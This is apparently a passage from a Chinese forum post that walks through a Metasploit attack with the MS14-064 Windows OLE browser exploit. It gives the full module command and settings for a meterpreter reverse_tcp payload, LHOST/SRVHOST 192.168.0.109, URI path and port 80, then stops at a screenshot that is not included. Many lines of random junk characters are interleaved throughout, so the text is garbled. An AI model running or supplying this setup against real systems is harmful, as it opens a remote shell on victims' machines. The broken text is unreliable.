: ^5 ?3 u: p, \5 j
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示9 n6 o2 j1 e) Q
- q) s4 z# s; T* {. I+ M9 V9 {8 M
! `4 l u5 W6 P5 W& P) L 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
# P$ k, p1 n9 u3 J( C0 h
a% }) g4 A. V4 e0 Z8 e- I& j U Z2 g( S2 h& g
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
8 [! u- I- D9 ^! z
6 l. q r: n# N% i2 s! i
2 A: c( N, P* ?9 f- L& \' S k set AllowPowershellPrompt true4 |& C: l% J6 i' y" n. @
! v' d3 t1 w7 O! {
& A% h" t9 ~; W8 r" T8 B Set LHOST 192.168.0.1091 G5 W& r3 ^0 Q- V# n
0 r* h; L; B' J9 S6 X
3 w4 k8 @! l4 d+ q A$ U set SRVHOST 192.168.0.109
6 q6 H: S: {3 S) X1 K; d4 J
- M' Z3 x# t) ^- \9 O( ~. l# n d& _7 K( I1 J0 ^& ^* V
Set uripath share
3 i+ O2 U. f3 S
3 Y! ^% g1 S( R' V
+ h; m( ^+ j/ e1 m% f Set srvport 80
( f3 T5 D& N' l2 Z4 f
! j0 ^% \% i& L7 y: i- R8 O
# g* `9 h. J& ~8 |$ ?5 r5 A
/ f" e( _3 L- u+ Z
. a0 ?2 F" T: d2 K" Y, z
0 z: O5 J' n0 R1 e6 a , S! S+ U& E1 I
% v X6 q) @- g7 s
$ y, b( I8 ?* f
5 o8 n3 f. j: o4 P
p+ h7 D1 M% k5 b D$ c
" \/ i5 f; `6 `1 W5 ^ , ]+ q8 Q3 D4 a! O2 D
3 ?. g$ z$ N5 Y, ]# \% t
O3 C& i# r# ]- v( M D4 _% f
5 ~6 O$ A) s$ R, ?
! [- }( x: ]5 S( x% b Z& F
9 N1 l8 n9 i* {
下面我们来访问本地地址如图:$ ^! C3 K& C4 t0 S6 L* z1 @$ ?; A
0 T6 c2 J+ c: S1 v
6 s: _. f* |! b: v$ x M 6 {( \' q0 ^2 c3 k6 _, ^
- s# R3 v& p4 ~4 |* f+ B( C! X: @8 r
. B: \, A3 u1 F0 F+ j& d. T5 Z! ^$ A8 n
7 h" Z8 ?! m! I+ U- m& @* M
4 [( H: K- Z8 Y
# T/ P8 D6 A) a! L7 b+ o1 T; G8 A! j; K